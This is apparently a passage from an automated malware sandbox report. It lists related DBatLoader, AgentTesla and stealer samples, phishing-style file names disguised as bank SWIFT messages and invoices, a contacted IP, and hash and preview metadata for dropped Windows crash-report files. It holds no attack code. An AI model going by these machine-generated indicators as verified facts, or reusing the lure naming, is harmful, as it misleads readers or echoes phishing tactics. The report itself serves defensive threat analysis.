                                                a0e9f5d64349fb13191bc781f81f42e16BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                                • 142.250.181.129
                                                AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 142.250.181.129
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 142.250.181.129

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\Public\alpha.pifRFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                  IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                    USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                            Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                              x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                  #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeGet hashmaliciousDBatLoader, FormBookBrowse

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SndVol.exe_2a34d4499138a07f93f374c737745cafe30b7df_15f2fd1e_2ed2e291-1011-42c6-840c-dbd314cdf520\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.8985452028302241
                                                                    Encrypted:false
                                                                    SSDEEP:192:V/V9IA4/l/0S3uYjqUdZrFzuiFsZ24IO8e7H:flClsS3uYjjzuiFsY4IO8cH
                                                                    MD5:778B3CD893DACD26410077273CE276C1
                                                                    SHA1:9898516459F2B9D8C39A9DF49CBA1DA4F56C62A7
                                                                    SHA-256:C6F5126DFD92B52DC0E974736712FAEEFED5854237C830AFD1C71822D4EB88A5
                                                                    SHA-512:A6735474F10AE903DD4AE577155E3E8C7EE68EDB2FE596892D9B85B5891E3F2F56EAE0EC043B705070CE08148613EA3AB6863E2496075122877C75E0F2DD7D45
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.7.1.1.2.9.3.9.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.7.1.6.6.1.5.4.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.d.2.e.2.9.1.-.1.0.1.1.-.4.2.c.6.-.8.4.0.c.-.d.b.d.3.1.4.c.d.f.5.2.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.a.8.1.7.9.3.-.2.8.d.2.-.4.1.f.2.-.8.6.7.5.-.c.7.3.f.c.0.c.2.0.b.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.n.d.V.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.n.d.V.o.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.0.-.0.0.0.1.-.0.0.1.4.-.3.b.9.5.-.a.9.9.6.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.2.1.e.f.9.5.c.5.f.7.4.1.1.f.0.5.e.3.4.5.f.5.c.8.a.1.0.7.b.b.1.c.b.1.a.1.d.a.9.!.

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SndVol.exe_30a7c05382919c22758b99127e1564cf8a12d6a0_15f2fd1e_6f6af954-d08e-4f2a-95c1-614b15e172ca\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.8984454195613704
                                                                    Encrypted:false
                                                                    SSDEEP:192:Ve9IA4/DD0MAxEAwjqUdZrFzuiFsZ24IO8e7H:glCDwMACAwjjzuiFsY4IO8cH
                                                                    MD5:0BDDF48CE866876B6BFD742FDED7BE05
                                                                    SHA1:4953E567A4F1083E9BE4F472A1A27D239D1CB5D8
                                                                    SHA-256:A349F9C634858DE0B40E4F013C0E125BA7E9B11EFEF7CF8E953C73F74D4F160F
                                                                    SHA-512:2CFFC28A988BCD544D58F6BAD5FA111B036D27FEE4B881B7363FA831905881D9015B73290ED834FF79BD523290F1E0FBF76A9BF76B792B86CC32AFCAB9706167
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.5.4.4.5.5.9.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.6.6.7.1.5.8.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.6.a.f.9.5.4.-.d.0.8.e.-.4.f.2.a.-.9.5.c.1.-.6.1.4.b.1.5.e.1.7.2.c.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.7.2.8.a.1.0.-.0.6.c.b.-.4.1.a.7.-.a.9.c.3.-.5.1.1.2.3.f.3.e.8.3.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.n.d.V.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.n.d.V.o.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.0.-.0.0.0.1.-.0.0.1.4.-.3.b.9.5.-.a.9.9.6.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.2.1.e.f.9.5.c.5.f.7.4.1.1.f.0.5.e.3.4.5.f.5.c.8.a.1.0.7.b.b.1.c.b.1.a.1.d.a.9.!.

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_175fe811589184573733f29f8d90926c9d3acb6_ddba1c1d_896fd093-19ca-4a1e-8301-677a8a25e309\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9301548821492783
                                                                    Encrypted:false
                                                                    SSDEEP:192:pWpxYz30S3u4jIylZrPjzuiFsZ24IO8B:E/YzES3u4jJzuiFsY4IO8B
                                                                    MD5:1006FDC20595F2D503BEC15827611CFD
                                                                    SHA1:62DEC411E2B369CE02C0360ED7F30CBA69906F27
                                                                    SHA-256:C3502BC20C0ACB2EF14C64A5EE2419C7001F6511907096051F488C6EFC6B8768
                                                                    SHA-512:FD59F57E19B6BA593A5C455CF218EEBA58B834FC4643D3D775EA5E1B65E0E7D077DE25ED090953D2878B4D62799D08B16D3E4F56F6D05A66F344B762F43569CE
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.2.8.1.4.5.8.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.3.3.8.1.8.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.6.f.d.0.9.3.-.1.9.c.a.-.4.a.1.e.-.8.3.0.1.-.6.7.7.a.8.a.2.5.e.3.0.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.b.8.5.a.7.6.-.a.6.0.e.-.4.9.e.3.-.8.8.1.5.-.9.9.9.3.e.8.1.9.6.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.1.a.5.2.-.5.2.9.1.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_3c3ed7f6d1b6f2b663d0a68a61f2223ae3ea1ea_ddba1c1d_100e9fa7-8485-408d-890e-a42f32003c03\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9298696597853339
                                                                    Encrypted:false
                                                                    SSDEEP:192:thXTmxYGX0S3u4jIylZrPjzuiFsZ24IO8B:DD2YGkS3u4jJzuiFsY4IO8B
                                                                    MD5:1231C97EB85593591E46B9665D4BA009
                                                                    SHA1:45C872A1FC79E8DBEA82EB1FD2087FE5BFBD5811
                                                                    SHA-256:1D9D96C86DB652FC4F20D13A4C4B2CE6900B19BE6A06287C8AFAE877FE04B78F
                                                                    SHA-512:6C352ECE5A3B95294E988095FC68D3962D81E87F655C226AB0231D219A0BFDE65E9D78FC994BBA714768C919A05474732790304210D81FA6661AFA8076045D8A
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.5.9.5.4.7.1.1.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.6.0.0.2.5.1.1.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.0.e.9.f.a.7.-.8.4.8.5.-.4.0.8.d.-.8.9.0.e.-.a.4.2.f.3.2.0.0.3.c.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.3.5.c.1.4.3.-.e.9.7.6.-.4.a.1.a.-.b.c.7.7.-.0.e.a.f.8.5.5.0.8.c.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.8.-.0.0.0.1.-.0.0.1.4.-.7.5.4.2.-.e.7.8.a.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_e08f44738a680ff1812c472f8c239d2dca1238f_ddba1c1d_97cf7208-2971-4814-be7b-50919cf9034b\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9299635135612762
                                                                    Encrypted:false
                                                                    SSDEEP:192:1FmxYtv0MAxEAQjIylZrPjzuiFsZ24IO8B:32YtcMACAQjJzuiFsY4IO8B
                                                                    MD5:B5888C2ACD92FE57BBBA6B9EAFBFF5BF
                                                                    SHA1:A47161B1C679E41EE3C93F2CAD7898ABEE97F1B2
                                                                    SHA-256:9888E659A650D8ADBF16FA8F1CEF7D433CE048D642AECEA5C5D94882FC54E1D3
                                                                    SHA-512:B5327473E608246654E9F5083C26564C75D5EA7EABF72E3AC8CEFBE33C6602F3EB935155A0B367865AACE25E2B9A01ACD4C30117913ABD88389B4E2D454BB2B5
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.4.6.0.0.9.8.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.4.6.7.8.8.8.1.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.c.f.7.2.0.8.-.2.9.7.1.-.4.8.1.4.-.b.e.7.b.-.5.0.9.1.9.c.f.9.0.3.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.f.3.0.6.6.3.-.7.3.4.0.-.4.f.3.4.-.a.d.5.1.-.1.9.0.5.6.b.2.7.2.4.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.b.8.-.0.0.0.1.-.0.0.1.4.-.7.5.4.2.-.e.7.8.a.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.

                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_e08f44738a680ff1812c472f8c239d2dca1238f_ddba1c1d_dae9bb0e-fa00-4fd8-8cf0-dc60dd63b84a\Report.wer

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):65536
                                                                    Entropy (8bit):0.9298476340274214
                                                                    Encrypted:false
                                                                    SSDEEP:192:TwZpxYxv0MAxEAQjIylZrPjzuiFsZ24IO8B:kZ/YxcMACAQjJzuiFsY4IO8B
                                                                    MD5:76B1E5EC91D888A7DC96691BF2215B65
                                                                    SHA1:A456DAA86EB007E36EF88A40BEE165E4688F5D0F
                                                                    SHA-256:81B04C0FB27C4BF68EB05EA95E31AF2FE14C89406F899FD5236E8F105E41CC38
                                                                    SHA-512:61F3AA8A4074381503F029BFCF5E7B93596B5F634605E5E54021E5301FC26F64BCD6D23BF6A36858AD68C67F4054CCDD9E98AFF4C3A4CD3156B55D405681F928
                                                                    Malicious:false
                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.0.7.8.7.5.6.7.6.5.2.0.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.0.7.8.7.5.7.6.1.1.1.9.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.e.9.b.b.0.e.-.f.a.0.0.-.4.f.d.8.-.8.c.f.0.-.d.c.6.0.d.d.6.3.b.8.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.a.e.4.d.4.f.-.2.c.2.8.-.4.d.a.d.-.b.9.1.2.-.4.b.5.f.3.a.1.a.5.5.0.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.o.l.o.r.c.p.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.1.a.5.2.-.5.2.9.1.d.2.3.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.7.e.9.b.2.6.7.f.a.e.e.4.5.9.3.d.f.4.4.e.4.1.b.0.a.5.f.b.9.0.0.d.e.6.2.0.6.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER810D.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:26 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):46950
                                                                    Entropy (8bit):2.0528010980463973
                                                                    Encrypted:false
                                                                    SSDEEP:192:QKCYRXcqXdV2k2O0e9daDHRPwPL34upx1dYHHE79CYgaYPrFu:YYl1V2kB0UaVYPL34Yx1iUCYgNFu
                                                                    MD5:4F204BD4BC9450E60A12A7431A5220CD
                                                                    SHA1:8CCBEA9011066A8EA7CDABCA8D88161C03FE66BA
                                                                    SHA-256:17E950A829DB0C131B82E5F723AD1FD9CFD59038090D25146E46993BA75B4126
                                                                    SHA-512:4B9778B30B127935471C9A6D6BA1D7337521E8DE6455A9DCA3CFBA061545D55FE304B64BAC9254B2BEE757BC858B226E7C99C57294806B251B79C0BD61F1DF29
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...............f...........0...........................................................................................eJ..............GenuineIntel............T............tEg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER82C3.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8384
                                                                    Entropy (8bit):3.7012991197378247
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJNL6+r46Yx86ALWjGgmfNwGfxYprx89baPsf8+m:R6lXJx6l6Ya6ALrgmfNXfla0fM
                                                                    MD5:428907974789DB8B866C20565768CA7E
                                                                    SHA1:77D08ED4A87921483D3F6BD399BFFB50E486B1AE
                                                                    SHA-256:6B067F4DF8AA73379B33041ECC63C75A26C7CD4CA5E1ACD27F1D5446868EABEB
                                                                    SHA-512:4E97741F941C899EAC325BD057666887AAB3691E9E76997372F737EB31C054C8B4116E21C94E06574B01B1400B324E3334B3DA6F91F5DD692030BBBC93DFB59E
                                                                    Malicious:false
                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.8.0.<./.P.i.

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8322.tmp.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4686
                                                                    Entropy (8bit):4.4831815261645716
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwWl8zsoJg77aI9rIWpW8VYoYm8M4JMDaJFP+q8nliL0V0e9d:uIjfuI7xh7VsJMDsckL0V0e9d
                                                                    MD5:688A84428A31C69EF169CEC935047655
                                                                    SHA1:D0D50510134DD9E4D3A5DA5F8BB14587A976CFD5
                                                                    SHA-256:447D59A46C78DF8D64996391D29AC762919E0A19443B25E35969245256B4C9E9
                                                                    SHA-512:435CADCA11D65FCF95CBBB61BC47F659E76F1A3359A3CE9AF5A9BCD433E11EF890B40C49E7CBD6728AA42941F57C96FB98D899A8F16CBEF59F850937DE390160
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="604695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB2A.tmp.dmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:37 2024, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):46882
                                                                    Entropy (8bit):2.05234672893411
                                                                    Encrypted:false
                                                                    SSDEEP:192:7SRXcqXdVXe9O0e9y0ps/eGQp2wd2DdEp1WQplYt5e+D08i:Wl1VOw0wps/eGQowIQ1WglE08
                                                                    MD5:9855477C490AFDAB2B59BDF1F73411E8
                                                                    SHA1:AF80C1E2EBAC7C1F6F4532844312A36A7CD117F4
                                                                    SHA-256:BEC4F7D05000C9CBF665542A4EFF4642FAA17C18402E1248AA48BA7736C31FD6
                                                                    SHA-512:854473FD6124909A33C63C6200D4C04B9BA91C483985B5F8007FDFDB87F3457995F12484B08B399D78DBBAE85C9CDE33D2C0FCE3E17184380F8E5AE5659C694E
                                                                    Malicious:false
                                                                    Preview:MDMP..a..... ........tEg.........................................,..........T.......8...........T...........x...............0...........................................................................................eJ..............GenuineIntel............T............tEg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC44.tmp.WERInternalMetadata.xml

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8372
                                                                    Entropy (8bit):3.7003524343587615
                                                                    Encrypted:false
                                                                    SSDEEP:192:R6l7wVeJu16tRf6YeU6hgmfNwGfxYprs89bC2sfry2m:R6lXJ86tRf6YN6hgmfNXfiCVfrq
                                                                    MD5:59CD62E30B307C4372C3CD2AB614C600
                                                                    SHA1:2C9973C0133AD26885FA16AC82370BF226C6C9F8
                                                                    SHA-256:4DAE69A65783C4C8D0A10805A1143111DB03D9FC1A52B52F8AA121E37963FD87
                                                                    SHA-512:E71FFEF34F889216C1410ABC69BEF2EF1CE88B0EFA8E62275623195576F19A7639DD5143E16FAA79532943E0631AD36FD81F01B3976E1FA337311B8D7D3A41B3
                                                                    Malicious:false
